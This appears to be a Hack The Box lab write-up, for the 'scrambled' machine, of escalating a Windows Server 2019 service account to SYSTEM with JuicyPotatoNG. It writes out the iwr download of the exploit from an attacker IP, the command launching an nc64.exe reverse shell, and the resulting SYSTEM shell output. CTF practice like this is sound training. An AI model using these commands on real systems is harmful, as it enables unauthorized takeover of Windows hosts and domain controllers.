JuicyPotatoNG
the sqlsvc user has both seassignprimarytokenprivilege and seimpersonateprivilege set. this makes the target system vulnerable to the potato exploits
I would usually use JuicyPotato for token impersonation, but it does not work on anything above Windows 10 1809 & Windows Server 2019
The target system is Windows Server 2019, so I would need something else.
There is a newer version of JuicyPotato called JuicyPotatoNG that works
- is newest version of Potato exploits
- uses a spoofing technique to bypass the windows firewall restriction (if enabled)
- is able to exploit LOCALLY
- more info can be found here
Exploit
The binary can be downloaded from the official GitHub repo
Exploitation
ps c:\Temp> iwr http://10.10.14.9/JuicyPotatoNG.exe -outfile C:\Temp\JuicyPotatoNG.exeDelivery complete
c:\Temp>.\JuicyPotatoNG.exe -t * -p C:\Temp\nc64.exe -a "10.10.14.9 1234 -e cmd"
JuicyPotatoNG
by decoder_it & splinter_code
[*] Testing CLSID {854A20FB-2D44-457D-992F-EF13785D2B51} - COM server port 10247
[+] authresult success {854A20FB-2D44-457D-992F-EF13785D2B51};NT AUTHORITY\SYSTEM;Impersonation
[+] CreateProcessAsUser OK
[+] Exploit successful! Launching the exploit
┌──(kali㉿kali)-[~/…/htb/labs/scrambled/potato]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.11.168] 63831
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.
c:\> whoami
whoami
nt authority\system
c:\> hostname
hostname
DC1
c:\> ipconfig
ipconfig
Windows IP Configuration
ethernet adapter ethernet0 2:
connection-specific dns suffix . : htb
ipv6 address. . . . . . . . . . . : dead:beef::181
ipv6 address. . . . . . . . . . . : dead:beef::8516:7ac6:78b:c7b
link-local ipv6 address . . . . . : fe80::8516:7ac6:78b:c7b%14
ipv4 address. . . . . . . . . . . : 10.10.11.168
subnet mask . . . . . . . . . . . : 255.255.254.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:eec2%14
10.10.10.2System Level Compromise